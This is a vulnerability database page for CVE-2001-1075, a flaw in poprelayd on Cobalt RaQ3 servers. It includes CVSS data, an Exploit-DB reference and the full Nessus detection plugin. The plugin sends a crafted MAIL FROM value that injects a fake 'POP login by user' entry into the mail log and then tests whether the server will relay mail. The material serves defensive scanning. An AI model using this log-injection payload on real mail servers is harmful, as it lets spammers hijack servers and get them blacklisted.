Vulnerabilities > CVE-2001-1075 - Unspecified vulnerability in SUN Cobalt RAQ 3I

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
sun
nessus
exploit available

Summary

poprelayd script before 2.0 in Cobalt RaQ3 servers allows remote attackers to bypass authentication for relaying by causing a "POP login by user" string that includes the attacker's IP address to be injected into the maillog log file.

Vulnerable Configurations

Part Description Count
Hardware
Sun
1

Exploit-Db

descriptionCobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability. CVE-2001-1075 . Remote exploit for linux platform
idEDB-ID:20994
last seen2016-02-02
modified2001-07-04
published2001-07-04
reporterAndrea Barisani
sourcehttps://www.exploit-db.com/download/20994/
titleCobalt Raq3 PopRelayD Arbitrary SMTP Relay Vulnerability

Nessus

NASL familySMTP problems
NASL idPOPRELAYD_AUTH.NASL
descriptionNessus has detected that the remote SMTP server allows relaying for users which were identified by
last seen2020-06-01
modified2020-06-02
plugin id11080
published2002-08-14
reporterThis script is Copyright (C) 2002-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11080
titlepoprelayd & sendmail Arbitrary Mail Relay
code
#
# (C) Tenable Network Security, Inc.
#

# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
#      Erik Anderson <[email protected]>
#      Added BugtraqID and CVE
#
# References:
# Date:  Tue, 3 Jul 2001 19:05:10 +0200 (CEST)
# From: "Andrea Barisani" <[email protected]>
# To: [email protected]
# Subject: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
#

include("compat.inc");

if (description)
{
 script_id(11080);
 script_version("1.29");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 script_cve_id("CVE-2001-1075");
 script_bugtraq_id(2986);

 script_name(english:"poprelayd & sendmail Arbitrary Mail Relay");
 script_summary(english:"Checks if the remote mail server can be used as a spam relay.");

  script_set_attribute(attribute:"synopsis", value:
"An open SMTP relay may be running on the remote host.");
 script_set_attribute(attribute:"description", value:
"Nessus has detected that the remote SMTP server allows relaying for
users which were identified by 'POP before SMTP'. The access control
mechanism is based on the POP server logs. However, it is possible to
poison these logs, which means that any spammer could be using your
mail server to send their emails to the world, thus flooding your
network bandwidth and possibly getting your mail server blacklisted.

Note that for some SMTP servers, such as Postfix, this plugin will
display a false positive.");
 script_set_attribute(attribute:"see_also", value:"https://en.wikipedia.org/wiki/Email_spam");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Jul/64");
 script_set_attribute(attribute:"solution", value:
"Disable poprelayd or upgrade it.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N");
 script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2001/07/03");
 script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/14");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_end_attributes();

 script_category(ACT_GATHER_INFO);
 script_family(english:"SMTP problems");

 script_copyright(english:"This script is Copyright (C) 2002-2019 Tenable Network Security, Inc.");

 script_dependencie("smtpserver_detect.nasl", "sendmail_expn.nasl", "smtp_relay.nasl", "smtp_settings.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/smtp", 25);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("smtp_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

# can't perform this test on localhost
if(islocalhost())exit(0);

port = get_service(svc:"smtp", default:25, exit_on_fail: 1);
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);

soc = open_sock_tcp(port);
if (!soc) exit(0);

data = smtp_recv_banner(socket:soc);
if(!data)exit(0);

domain = get_kb_item("Settings/third_party_domain");
if(!domain) domain = "nessus.org";

hel = string("HELO ", domain, "\r\n");
send(socket:soc, data:hel);
data = recv_line(socket:soc, length:1024);
mf1 = string("MAIL FROM: <test_1@", domain, ">\r\n");
send(socket:soc, data:mf1);
data = recv_line(socket:soc, length:1024);
rc1 = string("RCPT TO: <test_2@", domain, ">\r\n");
send(socket:soc, data: rc1);
data = recv_line(socket:soc, length:1024);
if ("Relaying denied. Please check your mail first." >< data) { suspicious=1;}
else if(ereg(pattern:"^250 .*", string:data))exit(0);

q = raw_string(0x22);	# Double quote
h = compat::this_host();
mf = string("mail from:", q, "POP login by user ", q, "admin", q,
	" at (", h, ") ", h, "@example.org\r\n");
send(socket: soc, data: mf);
data = recv_line(socket:soc, length:1024);
close(soc);
#
#sleep(10);
#
soc = open_sock_tcp(port);
if (!soc) exit(0);

data = smtp_recv_banner(socket:soc);
send(socket:soc, data:hel);
data = recv_line(socket:soc, length:1024);
send(socket:soc, data:mf1);
data = recv_line(socket:soc, length:1024);
send(socket:soc, data: rc1);
i = recv_line(socket:soc, length:4);
if (i == "250 ") security_warning(port);
close(soc);